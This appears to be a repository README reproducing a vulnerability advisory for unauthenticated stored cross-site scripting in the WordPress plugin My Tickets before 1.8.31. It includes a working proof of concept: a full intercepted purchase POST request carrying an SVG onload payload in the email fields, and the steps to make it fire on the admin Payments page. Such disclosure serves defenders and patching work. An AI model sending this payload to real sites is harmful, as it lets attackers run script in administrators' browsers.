.. | |||
README.md | Loading last commit info... |
README.md
My Tickets < 1.8.31 - Unauthenticated Stored Cross-Site Scripting
Description
The plugin does not properly sanitise and escape the Email field of booked tickets before outputting it in the Payment admin dashboard, which could allow unauthenticated users to perform Cross-Site Scripting attacks against admins
Proof of Concept
As unauthenticated, book a ticket, fill the purchase form with dummy data and intercept it to change the email address (which is validated client side but not server side) to something like <svg/onload=alert(/XSS/)>
POST /purchase/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 413
Origin: http://wp.lab
Connection: close
Cookie: mt_unique_id=-KFPBzwr-0Y2BZ1a
Upgrade-Insecure-Requests: 1
_wpnonce=97e4184df7&mt_gateway=offline&mt_cart_order%5B1950%5D%5Badult%5D%5Bcount%5D=1&mt_cart_order%5B1950%5D%5Badult%5D%5Bprice%5D=1.00&mt_cart_order%5B1950%5D%5Badult%5D%5Borig_price%5D=1&mt_fname=XSS&mt_lname=swd&mt_email=<svg/onload=alert(/XSS/)>&mt_email2=<svg/onload=alert(/XSS/)>&ticketing_method=printable&mt_submit=Review+cart+and+make+payment&my-tickets=true
Then confirm the Reservation. The XSS will be triggered when an admin view the Payments page in the admin dashboard (/wp-admin/edit.php?post_type=mt-payments)
References
https://wpscan.com/vulnerability/d973dc0f-3cb4-408d-a8b0-01abeb9ef951